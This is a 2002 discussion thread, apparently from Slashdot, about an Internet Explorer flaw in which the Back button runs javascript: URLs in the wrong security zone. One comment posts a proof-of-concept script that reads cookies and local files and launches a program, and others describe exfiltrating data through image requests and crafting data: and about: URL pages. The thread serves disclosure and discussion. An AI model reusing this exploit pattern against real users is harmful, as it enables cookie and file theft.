Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

Test it out if you have IE

[ekrout]

I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

Founder, monolinux

Re:Test it out if you have IE

[CmdrSanity]

McAfee stopped it cold.

Re:Test it out if you have IE

Doesn't work with patched IE 4.0 with all the patches and normal security settings :)

Doesn't work on Netscape 4.79 either! :P

Re:Test it out if you have IE

[sconeu]

I have the patch for MS02-015 (Q319182) installed, and Minesweeper fired up.

Re:Test it out if you have IE

[SomeGuyFromCA]

it still worked even after I changed the default security level for Local Intranet to High

That's because this doesn't work off local intranet, it works off local hard drive; files on your hard drive are automatically ran without safeties, and MICROS~1 does not offer any option to change this.

Re:Test it out if you have IE

[greenrd]

Actually, there is a registry hack to enable security configuration for "My Computer". But it's so annoying I wouldn't recommend it. As you browse around your HD in explorer it keeps warning you about ActiveX controls (i.e. explorer's built-in file displaying stuff. It's stupid.

Re:Test it out if you have IE

[Alsee]

TESTED AND VERIFIED UNDER GAMESPY ARCADE

This vulnerability affects applications which integrate IE functionality!

Gamespy "GameSpy Arcade is the #1 online gaming service... Support for over 300 of the leading games and demos".

-

Already tagged as virus by McAfee

I copied the HTML onto my webserver deliberately, and tried it out -- the exploit worked as expected EXCEPT when my virus scanner was on. Then I couldn't even save the web page when I copied the text to it. So a virus scanner prevents a IE bug? Weird.

Re:Java's been crashing IE of late

[asv108]

Java is insecure

I think your reffering to JavaScript orginally called livescript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

RTFE (exploit)

[gartogg]

If you read the exploit, you would see why this would not be possible.

You do not need to actually press the button, but you need to do it from a trusted page.

If MS had acted... any number of times...

[Wee]

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.

You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

-B

I wouldn't hedge my bets on Mozilla so blindly.

[Starship+Trooper]

Mozilla has its share of problems too; it's just that the media is so busy fawning over the bleeding-heart "David vs. Goliath" vision of Mozilla (much like that given to Linux in the old IPO rush days) to highlight these troubles. One particularly nasty problem Mozilla has is the ability to encode arbitrary data into a URL starting with "data:". This misfeature alone is enough for me to keep Mozilla off all my high-security computer systems until the project decides to either a) remove this "feature" as the debugging relic it is or b) add a preference to disable it, like Javascript or animated images.

For those not aware of his problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!

While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.

Re:I wouldn't hedge my bets on Mozilla so blindly.

[_bobs.pizza_]

Try using the same thing with IE, using about: instead.... "

about:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">

That just loops forever, refreshing the page, but you can put any valid HTML/JavaScript/VBScript code that you want in that and it does it.

This code is kept in the Internet Zone, so you can't be as malicious as you'd like. It does make an HTML page w/ whatever you put.

Re:What are the odds...

[SaDan]

Read the Bugtraq submission!

Title: Using the backbutton in IE is dangerous.
Date: [2002-04-15]
Software: At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating: Medium because user interaction is needed.
Impact: Read cookies/local files and execute code
(triggered when user hits the back button).
Patch: None.
Vendor: Microsoft contacted 12 Nov 2001, additional
information given 25 Mar 2002.
Workaround: Disable active scripting or never
use the back button.
Author: Andreas Sandblad, sandblad@acc.umu.se

MS was notified late last year... Just over five months ago.

Read, people... Read, then make comments. It's not that difficult.

Re:On a (somewhat) related topic...

[psocccer]

I agree the back button thing can be irritating, but sometimes you can't really work around it, e.g. if the page is dynamic and the data can change and the back button can become a data-integrity nightmare. Sure it can help to use transaction ID's and make sure nothing happens twice, but it's annoying to me as a web developer. Sometimes I wish there never was a back button.

For a concrete example of problems w/ the back button, check out acmemail. It's a cool webmail client, uses perl and pop3, but if a user clicks back, usually after reading a message and wanting to get back to the message list, it will cause strange problems and eventually auto-log them out. It took a long time to teach the outside sales staff at work that you just need to click the "inbox" button instead of back, and to this day every time there is a meeting they mention that webmail is broken, then I check it out, find out they're using back, and explain the solution. Then the next meeting comes and it's square one all over again...

Change the hand cursor-shape in 9x's Control Panel

[yerricde]

I want Mozilla to give me the netscape finger.

Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.

First LiveScript, then JavaScript, then ECMAScript

[yerricde]

I think you're referring to ECMAScript formerly called JavaScript

First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).

Re:A complete list

[jesser]

I wouldn't call this a "dumb ass bug". It's subtle, and finding it requires being aware of several things and thinking to combine them:

* javascript: URLs run in the security domain of the page from which they originate. (Or, if they're stored in the user's bookmarks, they run as part of the current page, letting them do cool things like show the HTML source of the selection.)

* If a javascript: URL returns a non-null value, it acts like a data: URL. For example, javascript:1+2;3+4 is equivalent to data:text/html,7. (Most of the time, this is just an annoyance, forcing you to put "void 0" at the end of a javascript: URL unless you're sure that the last calculation always returns null.)

* It is possible to go "forward" from a javascript: URL.

* The Back button incorrectly runs a javascript: URL in the security domain and context the current page instead of running it with no context or with the context of the page that put the URL in session history.

The fact that the bug was present in both IE and Mozilla until Mozilla 0.9.3 is strong evidence that the hole is not an obvious "dumb ass bug". I only discovered the hole because I make bookmarlets (javascript: URLs) in my free time and was being paid by Netscape to work on Mozilla security last summer.

One reason I love Opera

[Arker]

Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

This is a major one ,, user interaction not needed

[rahul_inblue]

The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

----cut here---

Press link and then the backbutton to trigger script.

Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


Read c:\test.txt (needs to be created)


Read Google cookie

// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "about: ";
function execFile(file){
alert (badUrl);

s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}

---cut here---

Re:hm

[Kanon]

2) I can disable the pop-under ads on sites I frequent by putting those sites into the "restricted" zone. Mozilla offers me no way to disable the popunders without completely disabling Javascript. (I'd rather have a option for "disable all javascript based popups", but at least IE gives me SOMETHING.)

Get a newer version of mozilla and go into preferences/advanced/scripts and windows.

Turn off the "open unrequested windows" tickbox. Bingo. You now have to click a link before the popup/under will open. Sites can't open them for you.

Stupid is as stupid does.

[BCTECH]

I have not seen a popup add in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have java script turned off. I have always thought that Java Script, captive X etc were the scourge of the internet.

Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security

Turn off everything for your internet zone. Add all your sites that you visit regularly to "Trusted Sites" and enable all the bells and wistles you want.

If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.

Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click . I would like such a power tool that would enable/disable java script with a click and another to add trusted zones on the fly. If anyone out there has the coding capability I think you may have something.

Re:Stupid is as stupid does.

[leighklotz]

Unfortunately, you are vulnerable to this one.

The insidious thing about this bug is that it breaks your security model. When you press back, the page you go back to is run in the security zone of the page you go back from. So, even if block "everything" in the "Internet Zone" site, if the next page you visit is in your trusted zone and you press the back button, it will run ActiveX controls or pop up or whatever bells and whistles are allowed on the page you came from.

Furthermore, note that Internet Explorer error pages (such a 404 Page Not Found) are automatically in the trusted zone. So, for you to be safe with your current policy, you need to do the following as well:

1. Avoid the back button from trusted pages
2. Don't click on broken links or anything else that gets an error page

Re:Is there a real exploit here?

[phyxeld]

Look at the exploit code.

See how the script calls an alert() with the contents of a local file from your drive? Thats very very bad.

If a remote script can read a file off your hard drive, it can then write bits of data into an img tag on the page, passing your stolen information to a remote server (via the image's src element) without your knowledge. Very very bad.

Re:yay for NAI

[Tryfen]

However, because it is not usually possible to clean or delete the offending page, it is possible to get the code to run.

Re:hm

[shakah]

This isn't quite the same thing, but you can block individual sites from popping up windows on entry to the site by putting something like the following in your preferences file (user.js):

user_pref("capability.policy.popupsites.sites", "http://www.morningstar.com/") ;
user_pref("capability.policy.popupsites.Window. ope n","noAccess") ;
user_pref("dom.disable_open_during_load", true) ;

Re:Go Mozilla!

[rapid+prototype]

yeah... those genius open-source guru types who know how to close an HTML tag...

-rp

MS patch for this already released March 29 2001??

[badzilla]

I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20

This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.

The exploit works with IE 5.5

I just tried the exploit on IE 5.5 (running on Windows 2000). The exploits works!

Nothing like a little backward compatibility.